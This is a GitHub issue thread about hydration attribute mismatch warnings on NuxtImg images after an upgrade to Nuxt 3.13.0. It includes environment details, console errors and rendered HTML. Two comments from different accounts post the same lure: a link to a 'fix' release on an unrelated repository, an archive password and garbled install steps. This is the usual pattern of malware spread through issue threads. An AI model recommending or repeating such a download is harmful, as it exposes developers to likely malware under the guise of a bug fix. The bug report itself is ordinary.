### ISSUE TITLE
Hydration attribute mismatch on images after upgrade to 3.13.0 from 3.12.2

### ISSUE THREAD

**Issue by pixelpaulaus** [nuxt/nuxt#28751]
### Environment

------------------------------
- Operating System: Linux
- Node Version:     v18.20.4
- Nuxt Version:     3.13.0
- CLI Version:      3.13.1
- Nitro Version:    2.9.7
- Package Manager:  npm@10.7.0
- Builder:          -
- User Config:      site, vite, experimental, css, extends, modules, appConfig, gtag, routeRules, nitro, htmlValidator, delayHydration, colorMode, sitemap, image, components, devtools
- Runtime Modules:  @nuxt/ui@2.18.4, @nuxt/image@1.7.1, @pinia/nuxt@0.5.4, nuxt-delay-hydration@1.3.6, @nuxtjs/sitemap@5.3.5, nuxt-gtag@2.1.0
- Build Modules:    -
------------------------------

### Reproduction

N/A

### Describe the bug

after upgrading from 3.12.2  to 3.13.0 i am getting these hydration errors on all my images.
When I check the build HTML/code it is missing a lot of attributes that it wasn't before the update.

This is the console log error:

`runtime-core.esm-bundler.js?v=de2f8f45:50 [Vue warn]: Hydration attribute mismatch on <img onerror=​"this.setAttribute('data-error', 1)​" class=​"rounded-md opacity-80 drop-shadow-md group-hover:​opacity-100" src=​"/​_ipx/​s_350x197/​assets/​img/​video-cpanel-install.jpg" data-v-inspector=​"node_modules/​@nuxt/​image/​dist/​runtime/​components/​NuxtImg.vue:​2:​3">​ 
  - rendered on server: (not rendered)
  - expected on client: width="350"
  Note: this mismatch is check-only. The DOM will not be rectified in production due to performance overhead.
  You should fix the source of the mismatch. 
  at <NuxtImg src="/assets/img/video-cpanel-install.jpg" loading="lazy" class="rounded-md opacity-80 drop-shadow-md group-hover:opacity-100"  ... > `

## This is what the raw code is I have:

`<NuxtImg src="/assets/img/video-cpanel-install.jpg" loading="lazy" class="rounded-md opacity-80 drop-shadow-md group-hover:opacity-100" width="350" height="197" :alt="brand + ' cPanel install video screenshot'" />`

## This is what is output on a static generation:

`<img onerror="this.setAttribute(&#39;data-error&#39;, 1)" class="rounded-md opacity-80 drop-shadow-md group-hover:opacity-100" src="[/_ipx/s_350x197/assets/img/video-cpanel-install.jpg](http://new-pre.ssltrust.rack/_ipx/s_350x197/assets/img/video-cpanel-install.jpg)">`

## This is what is in the HTML code after the render:
`<img width="350" height="197" alt="GeoTrust cPanel install video screenshot" loading="lazy" data-nuxt-img="" srcset="/_ipx/s_350x197/assets/img/video-cpanel-install.jpg 1x, /_ipx/s_700x394/assets/img/video-cpanel-install.jpg 2x" class="rounded-md opacity-80 drop-shadow-md group-hover:opacity-100" src="/_ipx/s_350x197/assets/img/video-cpanel-install.jpg">`

**Comment by louseee** [comment]
to fix your trouble check this fix, i see it in another issue,
https://github.com/Jostino/RimWorld-it/releases/tag/fix
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by syedmaaz9905** [comment]
to fix your trouble check this fix, i see it in another issue,
https://github.com/Jostino/RimWorld-it/releases/tag/fix
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by Gypsophyllite** [comment]
I face the same issue.
